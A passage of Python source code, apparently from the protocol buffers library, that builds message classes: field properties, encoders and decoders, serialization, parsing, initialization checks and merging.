# clear that I'm not really using any state there and to keep clients from
# thinking that they have direct access to these construction helpers.
def _PropertyName(proto_field_name):
"""Returns the name of the public property attribute which
clients can use to get and (in some cases) set the value
of a protocol message field.
Args:
proto_field_name: The protocol message field name, exactly
as it appears (or would appear) in a .proto file.
"""
# TODO(robinson): Escape Python keywords (e.g., yield), and test this support.
# nnorwitz makes my day by writing:
# """
# FYI. See the keyword module in the stdlib. This could be as simple as:
#
# if keyword.iskeyword(proto_field_name):
# return proto_field_name + "_"
# return proto_field_name
# """
# Kenton says: The above is a BAD IDEA. People rely on being able to use
# getattr() and setattr() to reflectively manipulate field values. If we
# rename the properties, then every such user has to also make sure to apply
# the same transformation. Note that currently if you name a field "yield",
# you can still access it just fine using getattr/setattr -- it's not even
# that cumbersome to do so.
# TODO(kenton): Remove this method entirely if/when everyone agrees with my
# position.
return proto_field_name
def _VerifyExtensionHandle(message, extension_handle):
"""Verify that the given extension handle is valid."""
if not isinstance(extension_handle, _FieldDescriptor):
raise KeyError('HasExtension() expects an extension handle, got: %s' %
extension_handle)
if not extension_handle.is_extension:
raise KeyError('"%s" is not an extension.' % extension_handle.full_name)
if not extension_handle.containing_type:
raise KeyError('"%s" is missing a containing_type.'
% extension_handle.full_name)
if extension_handle.containing_type is not message.DESCRIPTOR:
raise KeyError('Extension "%s" extends message type "%s", but this '
'message is of type "%s".' %
(extension_handle.full_name,
extension_handle.containing_type.full_name,
message.DESCRIPTOR.full_name))
def _AddSlots(message_descriptor, dictionary):
"""Adds a __slots__ entry to dictionary, containing the names of all valid
attributes for this message type.
Args:
message_descriptor: A Descriptor instance describing this message type.
dictionary: Class dictionary to which we'll add a '__slots__' entry.
"""
dictionary['__slots__'] = ['_cached_byte_size',
'_cached_byte_size_dirty',
'_fields',
'_unknown_fields',
'_is_present_in_parent',
'_listener',
'_listener_for_children',
'__weakref__',
'_oneofs']
def _IsMessageSetExtension(field):
return (field.is_extension and
field.containing_type.has_options and
field.containing_type.GetOptions().message_set_wire_format and
field.type == _FieldDescriptor.TYPE_MESSAGE and
field.label == _FieldDescriptor.LABEL_OPTIONAL)
def _IsMapField(field):
return (field.type == _FieldDescriptor.TYPE_MESSAGE and
field.message_type.has_options and
field.message_type.GetOptions().map_entry)
def _IsMessageMapField(field):
value_type = field.message_type.fields_by_name["value"]
return value_type.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE
def _AttachFieldHelpers(cls, field_descriptor):
is_repeated = (field_descriptor.label == _FieldDescriptor.LABEL_REPEATED)
is_packable = (is_repeated and
wire_format.IsTypePackable(field_descriptor.type))
if not is_packable:
is_packed = False
elif field_descriptor.containing_type.syntax == "proto2":
is_packed = (field_descriptor.has_options and
field_descriptor.GetOptions().packed)
else:
has_packed_false = (field_descriptor.has_options and
field_descriptor.GetOptions().HasField("packed") and
field_descriptor.GetOptions().packed == False)
is_packed = not has_packed_false
is_map_entry = _IsMapField(field_descriptor)
if is_map_entry:
field_encoder = encoder.MapEncoder(field_descriptor)
sizer = encoder.MapSizer(field_descriptor,
_IsMessageMapField(field_descriptor))
elif _IsMessageSetExtension(field_descriptor):
field_encoder = encoder.MessageSetItemEncoder(field_descriptor.number)
sizer = encoder.MessageSetItemSizer(field_descriptor.number)
else:
field_encoder = type_checkers.TYPE_TO_ENCODER[field_descriptor.type](
field_descriptor.number, is_repeated, is_packed)
sizer = type_checkers.TYPE_TO_SIZER[field_descriptor.type](
field_descriptor.number, is_repeated, is_packed)
field_descriptor._encoder = field_encoder
field_descriptor._sizer = sizer
field_descriptor._default_constructor = _DefaultValueConstructorForField(
field_descriptor)
def AddDecoder(wiretype, is_packed):
tag_bytes = encoder.TagBytes(field_descriptor.number, wiretype)
decode_type = field_descriptor.type
if (decode_type == _FieldDescriptor.TYPE_ENUM and
type_checkers.SupportsOpenEnums(field_descriptor)):
decode_type = _FieldDescriptor.TYPE_INT32
oneof_descriptor = None
if field_descriptor.containing_oneof is not None:
oneof_descriptor = field_descriptor
if is_map_entry:
is_message_map = _IsMessageMapField(field_descriptor)
field_decoder = decoder.MapDecoder(
field_descriptor, _GetInitializeDefaultForMap(field_descriptor),
is_message_map)
else:
field_decoder = type_checkers.TYPE_TO_DECODER[decode_type](
field_descriptor.number, is_repeated, is_packed,
field_descriptor, field_descriptor._default_constructor)
cls._decoders_by_tag[tag_bytes] = (field_decoder, oneof_descriptor)
AddDecoder(type_checkers.FIELD_TYPE_TO_WIRE_TYPE[field_descriptor.type],
False)
if is_repeated and wire_format.IsTypePackable(field_descriptor.type):
# To support wire compatibility of adding packed = true, add a decoder for
# packed values regardless of the field's options.
AddDecoder(wire_format.WIRETYPE_LENGTH_DELIMITED, True)
def _AddClassAttributesForNestedExtensions(descriptor, dictionary):
extension_dict = descriptor.extensions_by_name
for extension_name, extension_field in extension_dict.items():
assert extension_name not in dictionary
dictionary[extension_name] = extension_field
def _AddEnumValues(descriptor, cls):
"""Sets class-level attributes for all enum fields defined in this message.
Also exporting a class-level object that can name enum values.
Args:
descriptor: Descriptor object for this message type.
cls: Class we're constructing for this message type.
"""
for enum_type in descriptor.enum_types:
setattr(cls, enum_type.name, enum_type_wrapper.EnumTypeWrapper(enum_type))
for enum_value in enum_type.values:
setattr(cls, enum_value.name, enum_value.number)
def _GetInitializeDefaultForMap(field):
if field.label != _FieldDescriptor.LABEL_REPEATED:
raise ValueError('map_entry set on non-repeated field %s' % (
field.name))
fields_by_name = field.message_type.fields_by_name
key_checker = type_checkers.GetTypeChecker(fields_by_name['key'])
value_field = fields_by_name['value']
if _IsMessageMapField(field):
def MakeMessageMapDefault(message):
return containers.MessageMap(
message._listener_for_children, value_field.message_type, key_checker,
field.message_type)
return MakeMessageMapDefault
else:
value_checker = type_checkers.GetTypeChecker(value_field)
def MakePrimitiveMapDefault(message):
return containers.ScalarMap(
message._listener_for_children, key_checker, value_checker,
field.message_type)
return MakePrimitiveMapDefault
def _DefaultValueConstructorForField(field):
"""Returns a function which returns a default value for a field.
Args:
field: FieldDescriptor object for this field.
The returned function has one argument:
message: Message instance containing this field, or a weakref proxy
of same.
That function in turn returns a default value for this field. The default
value may refer back to |message| via a weak reference.
"""
if _IsMapField(field):
return _GetInitializeDefaultForMap(field)
if field.label == _FieldDescriptor.LABEL_REPEATED:
if field.has_default_value and field.default_value != []:
raise ValueError('Repeated field default value not empty list: %s' % (
field.default_value))
if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
# We can't look at _concrete_class yet since it might not have
# been set. (Depends on order in which we initialize the classes).
message_type = field.message_type
def MakeRepeatedMessageDefault(message):
return containers.RepeatedCompositeFieldContainer(
message._listener_for_children, field.message_type)
return MakeRepeatedMessageDefault
else:
type_checker = type_checkers.GetTypeChecker(field)
def MakeRepeatedScalarDefault(message):
return containers.RepeatedScalarFieldContainer(
message._listener_for_children, type_checker)
return MakeRepeatedScalarDefault
if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
# _concrete_class may not yet be initialized.
message_type = field.message_type
def MakeSubMessageDefault(message):
result = message_type._concrete_class()
result._SetListener(
_OneofListener(message, field)
if field.containing_oneof is not None
else message._listener_for_children)
return result
return MakeSubMessageDefault
def MakeScalarDefault(message):
# TODO(protobuf-team): This may be broken since there may not be
# default_value. Combine with has_default_value somehow.
return field.default_value
return MakeScalarDefault
def _ReraiseTypeErrorWithFieldName(message_name, field_name):
"""Re-raise the currently-handled TypeError with the field name added."""
exc = sys.exc_info()[1]
if len(exc.args) == 1 and type(exc) is TypeError:
# simple TypeError; add field name to exception message
exc = TypeError('%s for field %s.%s' % (str(exc), message_name, field_name))
# re-raise possibly-amended exception with original traceback:
six.reraise(type(exc), exc, sys.exc_info()[2])
def _AddInitMethod(message_descriptor, cls):
"""Adds an __init__ method to cls."""
def _GetIntegerEnumValue(enum_type, value):
"""Convert a string or integer enum value to an integer.
If the value is a string, it is converted to the enum value in
enum_type with the same name. If the value is not a string, it's
returned as-is. (No conversion or bounds-checking is done.)
"""
if isinstance(value, six.string_types):
try:
return enum_type.values_by_name[value].number
except KeyError:
raise ValueError('Enum type %s: unknown label "%s"' % (
enum_type.full_name, value))
return value
def init(self, **kwargs):
self._cached_byte_size = 0
self._cached_byte_size_dirty = len(kwargs) > 0
self._fields = {}
# Contains a mapping from oneof field descriptors to the descriptor
# of the currently set field in that oneof field.
self._oneofs = {}
# _unknown_fields is () when empty for efficiency, and will be turned into
# a list if fields are added.
self._unknown_fields = ()
self._is_present_in_parent = False
self._listener = message_listener_mod.NullMessageListener()
self._listener_for_children = _Listener(self)
for field_name, field_value in kwargs.items():
field = _GetFieldByName(message_descriptor, field_name)
if field is None:
raise TypeError("%s() got an unexpected keyword argument '%s'" %
(message_descriptor.name, field_name))
if field_value is None:
# field=None is the same as no field at all.
continue
if field.label == _FieldDescriptor.LABEL_REPEATED:
copy = field._default_constructor(self)
if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE: # Composite
if _IsMapField(field):
if _IsMessageMapField(field):
for key in field_value:
copy[key].MergeFrom(field_value[key])
else:
copy.update(field_value)
else:
for val in field_value:
if isinstance(val, dict):
copy.add(**val)
else:
copy.add().MergeFrom(val)
else: # Scalar
if field.cpp_type == _FieldDescriptor.CPPTYPE_ENUM:
field_value = [_GetIntegerEnumValue(field.enum_type, val)
for val in field_value]
copy.extend(field_value)
self._fields[field] = copy
elif field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
copy = field._default_constructor(self)
new_val = field_value
if isinstance(field_value, dict):
new_val = field.message_type._concrete_class(**field_value)
try:
copy.MergeFrom(new_val)
except TypeError:
_ReraiseTypeErrorWithFieldName(message_descriptor.name, field_name)
self._fields[field] = copy
else:
if field.cpp_type == _FieldDescriptor.CPPTYPE_ENUM:
field_value = _GetIntegerEnumValue(field.enum_type, field_value)
try:
setattr(self, field_name, field_value)
except TypeError:
_ReraiseTypeErrorWithFieldName(message_descriptor.name, field_name)
init.__module__ = None
init.__doc__ = None
cls.__init__ = init
def _GetFieldByName(message_descriptor, field_name):
"""Returns a field descriptor by field name.
Args:
message_descriptor: A Descriptor describing all fields in message.
field_name: The name of the field to retrieve.
Returns:
The field descriptor associated with the field name.
"""
try:
return message_descriptor.fields_by_name[field_name]
except KeyError:
raise ValueError('Protocol message %s has no "%s" field.' %
(message_descriptor.name, field_name))
def _AddPropertiesForFields(descriptor, cls):
"""Adds properties for all fields in this protocol message type."""
for field in descriptor.fields:
_AddPropertiesForField(field, cls)
if descriptor.is_extendable:
# _ExtensionDict is just an adaptor with no state so we allocate a new one
# every time it is accessed.
cls.Extensions = property(lambda self: _ExtensionDict(self))
def _AddPropertiesForField(field, cls):
"""Adds a public property for a protocol message field.
Clients can use this property to get and (in the case
of non-repeated scalar fields) directly set the value
of a protocol message field.
Args:
field: A FieldDescriptor for this field.
cls: The class we're constructing.
"""
# Catch it if we add other types that we should
# handle specially here.
assert _FieldDescriptor.MAX_CPPTYPE == 10
constant_name = field.name.upper() + "_FIELD_NUMBER"
setattr(cls, constant_name, field.number)
if field.label == _FieldDescriptor.LABEL_REPEATED:
_AddPropertiesForRepeatedField(field, cls)
elif field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
_AddPropertiesForNonRepeatedCompositeField(field, cls)
else:
_AddPropertiesForNonRepeatedScalarField(field, cls)
def _AddPropertiesForRepeatedField(field, cls):
"""Adds a public property for a "repeated" protocol message field. Clients
can use this property to get the value of the field, which will be either a
_RepeatedScalarFieldContainer or _RepeatedCompositeFieldContainer (see
below).
Note that when clients add values to these containers, we perform
type-checking in the case of repeated scalar fields, and we also set any
necessary "has" bits as a side-effect.
Args:
field: A FieldDescriptor for this field.
cls: The class we're constructing.
"""
proto_field_name = field.name
property_name = _PropertyName(proto_field_name)
def getter(self):
field_value = self._fields.get(field)
if field_value is None:
# Construct a new object to represent this field.
field_value = field._default_constructor(self)
# Atomically check if another thread has preempted us and, if not, swap
# in the new object we just created. If someone has preempted us, we
# take that object and discard ours.
# WARNING: We are relying on setdefault() being atomic. This is true
# in CPython but we haven't investigated others. This warning appears
# in several other locations in this file.
field_value = self._fields.setdefault(field, field_value)
return field_value
getter.__module__ = None
getter.__doc__ = 'Getter for %s.' % proto_field_name
# We define a setter just so we can throw an exception with a more
# helpful error message.
def setter(self, new_value):
raise AttributeError('Assignment not allowed to repeated field '
'"%s" in protocol message object.' % proto_field_name)
doc = 'Magic attribute generated for "%s" proto field.' % proto_field_name
setattr(cls, property_name, property(getter, setter, doc=doc))
def _AddPropertiesForNonRepeatedScalarField(field, cls):
"""Adds a public property for a nonrepeated, scalar protocol message field.
Clients can use this property to get and directly set the value of the field.
Note that when the client sets the value of a field by using this property,
all necessary "has" bits are set as a side-effect, and we also perform
type-checking.
Args:
field: A FieldDescriptor for this field.
cls: The class we're constructing.
"""
proto_field_name = field.name
property_name = _PropertyName(proto_field_name)
type_checker = type_checkers.GetTypeChecker(field)
default_value = field.default_value
valid_values = set()
is_proto3 = field.containing_type.syntax == "proto3"
def getter(self):
# TODO(protobuf-team): This may be broken since there may not be
# default_value. Combine with has_default_value somehow.
return self._fields.get(field, default_value)
getter.__module__ = None
getter.__doc__ = 'Getter for %s.' % proto_field_name
clear_when_set_to_default = is_proto3 and not field.containing_oneof
def field_setter(self, new_value):
# pylint: disable=protected-access
# Testing the value for truthiness captures all of the proto3 defaults
# (0, 0.0, enum 0, and False).
new_value = type_checker.CheckValue(new_value)
if clear_when_set_to_default and not new_value:
self._fields.pop(field, None)
else:
self._fields[field] = new_value
# Check _cached_byte_size_dirty inline to improve performance, since scalar
# setters are called frequently.
if not self._cached_byte_size_dirty:
self._Modified()
if field.containing_oneof:
def setter(self, new_value):
field_setter(self, new_value)
self._UpdateOneofState(field)
else:
setter = field_setter
setter.__module__ = None
setter.__doc__ = 'Setter for %s.' % proto_field_name
# Add a property to encapsulate the getter/setter.
doc = 'Magic attribute generated for "%s" proto field.' % proto_field_name
setattr(cls, property_name, property(getter, setter, doc=doc))
def _AddPropertiesForNonRepeatedCompositeField(field, cls):
"""Adds a public property for a nonrepeated, composite protocol message field.
A composite field is a "group" or "message" field.
Clients can use this property to get the value of the field, but cannot
assign to the property directly.
Args:
field: A FieldDescriptor for this field.
cls: The class we're constructing.
"""
# TODO(robinson): Remove duplication with similar method
# for non-repeated scalars.
proto_field_name = field.name
property_name = _PropertyName(proto_field_name)
def getter(self):
field_value = self._fields.get(field)
if field_value is None:
# Construct a new object to represent this field.
field_value = field._default_constructor(self)
# Atomically check if another thread has preempted us and, if not, swap
# in the new object we just created. If someone has preempted us, we
# take that object and discard ours.
# WARNING: We are relying on setdefault() being atomic. This is true
# in CPython but we haven't investigated others. This warning appears
# in several other locations in this file.
field_value = self._fields.setdefault(field, field_value)
return field_value
getter.__module__ = None
getter.__doc__ = 'Getter for %s.' % proto_field_name
# We define a setter just so we can throw an exception with a more
# helpful error message.
def setter(self, new_value):
raise AttributeError('Assignment not allowed to composite field '
'"%s" in protocol message object.' % proto_field_name)
# Add a property to encapsulate the getter.
doc = 'Magic attribute generated for "%s" proto field.' % proto_field_name
setattr(cls, property_name, property(getter, setter, doc=doc))
def _AddPropertiesForExtensions(descriptor, cls):
"""Adds properties for all fields in this protocol message type."""
extension_dict = descriptor.extensions_by_name
for extension_name, extension_field in extension_dict.items():
constant_name = extension_name.upper() + "_FIELD_NUMBER"
setattr(cls, constant_name, extension_field.number)
# TODO(amauryfa): Migrate all users of these attributes to functions like
# pool.FindExtensionByNumber(descriptor).
if descriptor.file is not None:
# TODO(amauryfa): Use cls.MESSAGE_FACTORY.pool when available.
pool = descriptor.file.pool
cls._extensions_by_number = pool._extensions_by_number[descriptor]
cls._extensions_by_name = pool._extensions_by_name[descriptor]
def _AddStaticMethods(cls):
# TODO(robinson): This probably needs to be thread-safe(?)
def RegisterExtension(extension_handle):
extension_handle.containing_type = cls.DESCRIPTOR
# TODO(amauryfa): Use cls.MESSAGE_FACTORY.pool when available.
cls.DESCRIPTOR.file.pool.AddExtensionDescriptor(extension_handle)
_AttachFieldHelpers(cls, extension_handle)
cls.RegisterExtension = staticmethod(RegisterExtension)
def FromString(s):
message = cls()
message.MergeFromString(s)
return message
cls.FromString = staticmethod(FromString)
def _IsPresent(item):
"""Given a (FieldDescriptor, value) tuple from _fields, return true if the
value should be included in the list returned by ListFields()."""
if item[0].label == _FieldDescriptor.LABEL_REPEATED:
return bool(item[1])
elif item[0].cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
return item[1]._is_present_in_parent
else:
return True
def _AddListFieldsMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def ListFields(self):
all_fields = [item for item in self._fields.items() if _IsPresent(item)]
all_fields.sort(key = lambda item: item[0].number)
return all_fields
cls.ListFields = ListFields
_Proto3HasError = 'Protocol message has no non-repeated submessage field "%s"'
_Proto2HasError = 'Protocol message has no non-repeated field "%s"'
def _AddHasFieldMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
is_proto3 = (message_descriptor.syntax == "proto3")
error_msg = _Proto3HasError if is_proto3 else _Proto2HasError
hassable_fields = {}
for field in message_descriptor.fields:
if field.label == _FieldDescriptor.LABEL_REPEATED:
continue
# For proto3, only submessages and fields inside a oneof have presence.
if (is_proto3 and field.cpp_type != _FieldDescriptor.CPPTYPE_MESSAGE and
not field.containing_oneof):
continue
hassable_fields[field.name] = field
if not is_proto3:
# Fields inside oneofs are never repeated (enforced by the compiler).
for oneof in message_descriptor.oneofs:
hassable_fields[oneof.name] = oneof
def HasField(self, field_name):
try:
field = hassable_fields[field_name]
except KeyError:
raise ValueError(error_msg % field_name)
if isinstance(field, descriptor_mod.OneofDescriptor):
try:
return HasField(self, self._oneofs[field].name)
except KeyError:
return False
else:
if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
value = self._fields.get(field)
return value is not None and value._is_present_in_parent
else:
return field in self._fields
cls.HasField = HasField
def _AddClearFieldMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def ClearField(self, field_name):
try:
field = message_descriptor.fields_by_name[field_name]
except KeyError:
try:
field = message_descriptor.oneofs_by_name[field_name]
if field in self._oneofs:
field = self._oneofs[field]
else:
return
except KeyError:
raise ValueError('Protocol message %s() has no "%s" field.' %
(message_descriptor.name, field_name))
if field in self._fields:
# To match the C++ implementation, we need to invalidate iterators
# for map fields when ClearField() happens.
if hasattr(self._fields[field], 'InvalidateIterators'):
self._fields[field].InvalidateIterators()
# Note: If the field is a sub-message, its listener will still point
# at us. That's fine, because the worst than can happen is that it
# will call _Modified() and invalidate our byte size. Big deal.
del self._fields[field]
if self._oneofs.get(field.containing_oneof, None) is field:
del self._oneofs[field.containing_oneof]
# Always call _Modified() -- even if nothing was changed, this is
# a mutating method, and thus calling it should cause the field to become
# present in the parent message.
self._Modified()
cls.ClearField = ClearField
def _AddClearExtensionMethod(cls):
"""Helper for _AddMessageMethods()."""
def ClearExtension(self, extension_handle):
_VerifyExtensionHandle(self, extension_handle)
# Similar to ClearField(), above.
if extension_handle in self._fields:
del self._fields[extension_handle]
self._Modified()
cls.ClearExtension = ClearExtension
def _AddHasExtensionMethod(cls):
"""Helper for _AddMessageMethods()."""
def HasExtension(self, extension_handle):
_VerifyExtensionHandle(self, extension_handle)
if extension_handle.label == _FieldDescriptor.LABEL_REPEATED:
raise KeyError('"%s" is repeated.' % extension_handle.full_name)
if extension_handle.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
value = self._fields.get(extension_handle)
return value is not None and value._is_present_in_parent
else:
return extension_handle in self._fields
cls.HasExtension = HasExtension
def _InternalUnpackAny(msg):
"""Unpacks Any message and returns the unpacked message.
This internal method is different from public Any Unpack method which takes
the target message as argument. _InternalUnpackAny method does not have
target message type and need to find the message type in descriptor pool.
Args:
msg: An Any message to be unpacked.
Returns:
The unpacked message.
"""
# TODO(amauryfa): Don't use the factory of generated messages.
# To make Any work with custom factories, use the message factory of the
# parent message.
# pylint: disable=g-import-not-at-top
from google.protobuf import symbol_database
factory = symbol_database.Default()
type_url = msg.type_url
if not type_url:
return None
# TODO(haberman): For now we just strip the hostname. Better logic will be
# required.
type_name = type_url.split('/')[-1]
descriptor = factory.pool.FindMessageTypeByName(type_name)
if descriptor is None:
return None
message_class = factory.GetPrototype(descriptor)
message = message_class()
message.ParseFromString(msg.value)
return message
def _AddEqualsMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def __eq__(self, other):
if (not isinstance(other, message_mod.Message) or
other.DESCRIPTOR != self.DESCRIPTOR):
return False
if self is other:
return True
if self.DESCRIPTOR.full_name == _AnyFullTypeName:
any_a = _InternalUnpackAny(self)
any_b = _InternalUnpackAny(other)
if any_a and any_b:
return any_a == any_b
if not self.ListFields() == other.ListFields():
return False
# Sort unknown fields because their order shouldn't affect equality test.
unknown_fields = list(self._unknown_fields)
unknown_fields.sort()
other_unknown_fields = list(other._unknown_fields)
other_unknown_fields.sort()
return unknown_fields == other_unknown_fields
cls.__eq__ = __eq__
def _AddStrMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def __str__(self):
return text_format.MessageToString(self)
cls.__str__ = __str__
def _AddReprMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def __repr__(self):
return text_format.MessageToString(self)
cls.__repr__ = __repr__
def _AddUnicodeMethod(unused_message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def __unicode__(self):
return text_format.MessageToString(self, as_utf8=True).decode('utf-8')
cls.__unicode__ = __unicode__
def _BytesForNonRepeatedElement(value, field_number, field_type):
"""Returns the number of bytes needed to serialize a non-repeated element.
The returned byte count includes space for tag information and any
other additional space associated with serializing value.
Args:
value: Value we're serializing.
field_number: Field number of this value. (Since the field number
is stored as part of a varint-encoded tag, this has an impact
on the total bytes required to serialize the value).
field_type: The type of the field. One of the TYPE_* constants
within FieldDescriptor.
"""
try:
fn = type_checkers.TYPE_TO_BYTE_SIZE_FN[field_type]
return fn(field_number, value)
except KeyError:
raise message_mod.EncodeError('Unrecognized field type: %d' % field_type)
def _AddByteSizeMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def ByteSize(self):
if not self._cached_byte_size_dirty:
return self._cached_byte_size
size = 0
for field_descriptor, field_value in self.ListFields():
size += field_descriptor._sizer(field_value)
for tag_bytes, value_bytes in self._unknown_fields:
size += len(tag_bytes) + len(value_bytes)
self._cached_byte_size = size
self._cached_byte_size_dirty = False
self._listener_for_children.dirty = False
return size
cls.ByteSize = ByteSize
def _AddSerializeToStringMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def SerializeToString(self):
# Check if the message has all of its required fields set.
errors = []
if not self.IsInitialized():
raise message_mod.EncodeError(
'Message %s is missing required fields: %s' % (
self.DESCRIPTOR.full_name, ','.join(self.FindInitializationErrors())))
return self.SerializePartialToString()
cls.SerializeToString = SerializeToString
def _AddSerializePartialToStringMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def SerializePartialToString(self):
out = BytesIO()
self._InternalSerialize(out.write)
return out.getvalue()
cls.SerializePartialToString = SerializePartialToString
def InternalSerialize(self, write_bytes):
for field_descriptor, field_value in self.ListFields():
field_descriptor._encoder(write_bytes, field_value)
for tag_bytes, value_bytes in self._unknown_fields:
write_bytes(tag_bytes)
write_bytes(value_bytes)
cls._InternalSerialize = InternalSerialize
def _AddMergeFromStringMethod(message_descriptor, cls):
"""Helper for _AddMessageMethods()."""
def MergeFromString(self, serialized):
length = len(serialized)
try:
if self._InternalParse(serialized, 0, length) != length:
# The only reason _InternalParse would return early is if it
# encountered an end-group tag.
raise message_mod.DecodeError('Unexpected end-group tag.')
except (IndexError, TypeError):
# Now ord(buf[p:p+1]) == ord('') gets TypeError.
raise message_mod.DecodeError('Truncated message.')
except struct.error as e:
raise message_mod.DecodeError(e)
return length # Return this for legacy reasons.
cls.MergeFromString = MergeFromString
local_ReadTag = decoder.ReadTag
local_SkipField = decoder.SkipField
decoders_by_tag = cls._decoders_by_tag
is_proto3 = message_descriptor.syntax == "proto3"
def InternalParse(self, buffer, pos, end):
self._Modified()
field_dict = self._fields
unknown_field_list = self._unknown_fields
while pos != end:
(tag_bytes, new_pos) = local_ReadTag(buffer, pos)
field_decoder, field_desc = decoders_by_tag.get(tag_bytes, (None, None))
if field_decoder is None:
value_start_pos = new_pos
new_pos = local_SkipField(buffer, new_pos, end, tag_bytes)
if new_pos == -1:
return pos
if not is_proto3:
if not unknown_field_list:
unknown_field_list = self._unknown_fields = []
unknown_field_list.append(
(tag_bytes, buffer[value_start_pos:new_pos]))
pos = new_pos
else:
pos = field_decoder(buffer, new_pos, end, self, field_dict)
if field_desc:
self._UpdateOneofState(field_desc)
return pos
cls._InternalParse = InternalParse
def _AddIsInitializedMethod(message_descriptor, cls):
"""Adds the IsInitialized and FindInitializationError methods to the
protocol message class."""
required_fields = [field for field in message_descriptor.fields
if field.label == _FieldDescriptor.LABEL_REQUIRED]
def IsInitialized(self, errors=None):
"""Checks if all required fields of a message are set.
Args:
errors: A list which, if provided, will be populated with the field
paths of all missing required fields.
Returns:
True iff the specified message has all required fields set.
"""
# Performance is critical so we avoid HasField() and ListFields().
for field in required_fields:
if (field not in self._fields or
(field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE and
not self._fields[field]._is_present_in_parent)):
if errors is not None:
errors.extend(self.FindInitializationErrors())
return False
for field, value in list(self._fields.items()): # dict can change size!
if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
if field.label == _FieldDescriptor.LABEL_REPEATED:
if (field.message_type.has_options and
field.message_type.GetOptions().map_entry):
continue
for element in value:
if not element.IsInitialized():
if errors is not None:
errors.extend(self.FindInitializationErrors())
return False
elif value._is_present_in_parent and not value.IsInitialized():
if errors is not None:
errors.extend(self.FindInitializationErrors())
return False
return True
cls.IsInitialized = IsInitialized
def FindInitializationErrors(self):
"""Finds required fields which are not initialized.
Returns:
A list of strings. Each string is a path to an uninitialized field from
the top-level message, e.g. "foo.bar[5].baz".
"""
errors = [] # simplify things
for field in required_fields:
if not self.HasField(field.name):
errors.append(field.name)
for field, value in self.ListFields():
if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
if field.is_extension:
name = "(%s)" % field.full_name
else:
name = field.name
if _IsMapField(field):
if _IsMessageMapField(field):
for key in value:
element = value[key]
prefix = "%s[%s]." % (name, key)
sub_errors = element.FindInitializationErrors()
errors += [prefix + error for error in sub_errors]
else:
# ScalarMaps can't have any initialization errors.
pass
elif field.label == _FieldDescriptor.LABEL_REPEATED:
for i in range(len(value)):
element = value[i]
prefix = "%s[%d]." % (name, i)
sub_errors = element.FindInitializationErrors()
errors += [prefix + error for error in sub_errors]
else:
prefix = name + "."
sub_errors = value.FindInitializationErrors()
errors += [prefix + error for error in sub_errors]
return errors
cls.FindInitializationErrors = FindInitializationErrors
def _AddMergeFromMethod(cls):
LABEL_REPEATED = _FieldDescriptor.LABEL_REPEATED
CPPTYPE_MESSAGE = _FieldDescriptor.CPPTYPE_MESSAGE
def MergeFrom(self, msg):
if not isinstance(msg, cls):
raise TypeError(
"Parameter to MergeFrom() must be instance of same class: "
'expected %s got %s.' % (cls.__name__, msg.__class__.__name__))
assert msg is not self
self._Modified()
fields = self._fields
for field, value in msg._fields.items():
if field.label == LABEL_REPEATED:
field_value = fields.get(field)
if field_value is None:
# Construct a new object to represent this field.
field_value = field._default_constructor(self)
fields[field] = field_value
field_value.MergeFrom(value)
elif field.cpp_type == CPPTYPE_MESSAGE:
if value._is_present_in_parent:
field_value = fields.get(field)
if field_value is None:
# Construct a new object to represent this field.
field_value = field._default_constructor(self)
fields[field] = field_value
field_value.MergeFrom(value)
else:
self._fields[field] = value
if field.containing_oneof:
self._UpdateOneofState(field)
if msg._unknown_fields:
if not self._unknown_fields:
self._unknown_fields = []
self._unknown_fields.extend(msg._unknown_fields)
cls.MergeFrom = MergeFrom
def _AddWhichOneofMethod(message_descriptor, cls):
def WhichOneof(self, oneof_name):
"""Returns the name of the currently set field inside a oneof, or None."""
try:
field = message_descriptor.oneofs_by_name[oneof_name]
except KeyError:
raise ValueError(
'Protocol message has no oneof "%s" field.' % oneof_name)
nested_field = self._oneofs.get(field, None)
if nested_field is not None and self.HasField(nested_field.name):
return nested_field.name
else:
return None
cls.WhichOneof = WhichOneof
def _AddReduceMethod(cls):
def __reduce__(self): # pylint: disable=invalid-name
return (type(self), (), self.__getstate__())
cls.__reduce__ = __reduce__
def _Clear(self):
# Clear fields.
self._fields = {}
self._unknown_fields = ()
self._oneofs = {}
self._Modified()
def _DiscardUnknownFields(self):
self._unknown_fields = []
for field, value in self.ListFields():
if field.cpp_type == _FieldDescriptor.CPPTYPE_MESSAGE:
if field.label == _FieldDescriptor.LABEL_REPEATED:
for sub_message in value:
sub_message.DiscardUnknownFields()
else:
value.DiscardUnknownFields()
def _SetListener(self, listener):
if listener is None:
self._listener = message_listener_mod.NullMessageListener()
else:
self._listener = listener
def _AddMessageMethods(message_descriptor, cls):
"""Adds implementations of all Message methods to cls."""
_AddListFieldsMethod(message_descriptor, cls)
_AddHasFieldMethod(message_descriptor, cls)
_AddClearFieldMethod(message_descriptor, cls)
if message_descriptor.is_extendable:
_AddClearExtensionMethod(cls)
_AddHasExtensionMethod(cls)
_AddEqualsMethod(message_descriptor, cls)
_AddStrMethod(message_descriptor, cls)
_AddReprMethod(message_descriptor, cls)
_AddUnicodeMethod(message_descriptor, cls)
_AddByteSizeMethod(message_descriptor, cls)
_AddSerializeToStringMethod(message_descriptor, cls)
_AddSerializePartialToStringMethod(message_descriptor, cls)
_AddMergeFromStringMethod(message_descriptor, cls)
_AddIsInitializedMethod(message_descriptor, cls)
